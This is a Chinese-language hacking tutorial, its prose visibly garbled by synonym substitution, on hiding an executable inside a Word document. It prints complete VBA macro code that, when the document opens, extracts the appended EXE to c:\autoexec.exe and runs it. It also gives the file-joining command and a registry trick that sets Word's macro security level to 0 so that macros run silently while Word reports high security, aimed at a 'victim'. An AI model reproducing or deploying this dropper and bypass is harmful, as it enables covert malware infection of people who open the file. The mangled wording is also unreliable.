EXE变DOC的方法

EXE变DOC的方法本来这种变换并不是文献方法上的变革,只然而是把一个exe文献接在一个doc文献的结束罢了,这个doc文献固然就不是各别word的文书档案啦,该文书档案中包括了宏语句,能在运转的功夫把接在本人文献结束的exe文献数据读掏出来并运转,就形成一种假象,好象文书档案翻开时就运转了exe文献似的.(和文献绑缚器的道理很象啊!) 熟习vb的伙伴都领会,word的宏是运用vba来编写的,简直语法和vb一律,但有些本领vb中没有,如宏宏病毒即是运用宏复制语句来到达熏染的手段.和vb一律,咱们不妨在编写宏的功夫挪用windows api!!底下咱们来引见一下咱们编写这个宏须要用到的api因变量: 1)createfile 用来翻开文献,该因变量vb的证明如次: declare function createfile lib "kernel32" alias "createfilea" (byval lpfilename as string, byval dwdesiredaccess as long, byval dwsharemode as long, byval lpsecurityattributes as long, byval dwcreationdistribution as long, byval dwflagsandattributes as long, byval htemplate as long) as long 2)closehandle 用来封闭被翻开文献的句柄,该因变量vb的证明如次: declare function closehandle lib "kernel32" (byval hobject as long) as long 3)readfile 用来从被翻开文献中读取数据,该因变量vb的证明如次: declare function readfile lib "kernel32" (byval hfile as long, lpbuffer as byte, byval dwnumberofbytestoread as long, lpnumberofbytesread as long, byval lpoverlapped as long) as long 4)writefile 用来把读掏出的数据写入文献,该因变量vb的证明如次: declare function writefile lib "kernel32" (byval hfile as long, lpbuffer as byte, byval dwnumberofbytestowrite as long, lpnumberofbyteswritten as long, byval lpoverlapped as long) as long 5)setfileponiter挪动文献南针,该因变量vb的证明如次: declare function setfilepointer lib "kernel32" (byval hfile as long, byval ldistancetomove as long, byval lpdistancetomovehigh as long, byval dwmovemethod as long) as long 6)底下是之上因变量的参数证明 public const generic_read as long = &h80000000 public const generic_write as long = &h40000000 public const file_share_read as long = 1 public const file_share_write as long = 2 public const create_new as long = 1 public const create_always as long = 2 public const open_existing as long = 3 public const open_always as long = 4 public const truncate_existing as long = 5 public const invalid_handle_value as long = -1 public const file_attribute_normal as long = &h80 好了,有了那些筹备处事就不妨发端了,咱们运转word2000,翻开visual basic编纂器,兴建一个模块,把上头的因变量和参数证明拷进去!再回到“thisdocument”的代码视图，采用document open的事变，输出一下代码： private sub document_open() dim buffer(65536) as byte dim h, h2, j, i, k as long h = createfile(thisdocument.path & "/" & thisdocument.name, generic_read, file_share_read + file_share_write, 0, open_existing, 0, 0) ‘以share_read的办法翻开自己的doc文献 h2 = createfile("c:\autoexec.exe", generic_write, 0, 0, create_always, 0, 0) ‘兴建一个exe文献筹备寄存读掏出来的数据. if h = invalid_handle_value then exit sub end if k = setfilepointer(h, 32768, nil, 0) ‘把文献南针挪动到doc文献与exe文献接壤处. do i = readfile(h, buffer(0), 65536, j, 0) i = writefile(h2, buffer(0), j, j, 0) loop until j < 65536 closehandle (h) closehandle (h2) shell "c:\autoexec.exe" ‘运转exe文献 end sub  如许宏就编写好了,提防的场合即是上头setfilepointer因变量的运用局部:32768是你编写完宏生存好的doc文献的文献巨细,纷歧顶即是32768哦,大师提防! 大师大概有疑义,怎样把exe文献接到doc文献反面呢?很大略,把你要接的exe放到和这个doc文献同一个目次下.运转doc吩咐: copy /b xxxx.doc + xxxxx.exe newdoc.doc 如许就不妨了~~~.当你翻开这个newdoc.doc的功夫,宏就会把反面的exe文献读出来并生存在c:\autoexec.exe中,而后运转,是否很恐惧啊!然而这须要你的word2000安定度为最低的功夫本领实行,对于这个安定度的题目,咱们又创造了微软的小bug,大师看看备案表中这个键: hkey_current_user\software\microsoft\office\9.0\word\security 中的 level值.当安定度是3(高)的功夫,word不会运转任何的宏,2(中)的功夫word会咨询你能否运转宏,1(低)的功夫word就会机动运转一切的宏!但很简单就被创造安定度被设为低了,聪慧的你确定想到即使这个值变为0的功夫会如何样!!??对了!即使设为0的话,word内里就会表露安定度为高,但却能机动运转任何的宏!!是否很夸大??和备案表编纂器的方便之门一律这都是ms的方便之门吧? 即使要被害人的呆板接收你的doc文献又能成功运转,最要害即是把word的安定度在备案表中的值改为0,如何改??本领太多了吧,单是ie的歹意代码能实行的都太多了,其余,即使网页上贯穿上是doc的话,ie也会机动载入该doc文献!伤害的ms啊!! 这个算不算缺点我不敢说,但提防真的很难,只有一天到晚监督着备案表,大概不必word?太失望了吧,最要害的是提防提防,生疏人的货色万万不要收!囊括非exe文献,咱们此刻创造了doc文献能湮没exe文献，也会有人创造其余文献能湮没exe,以是大师万万要提防.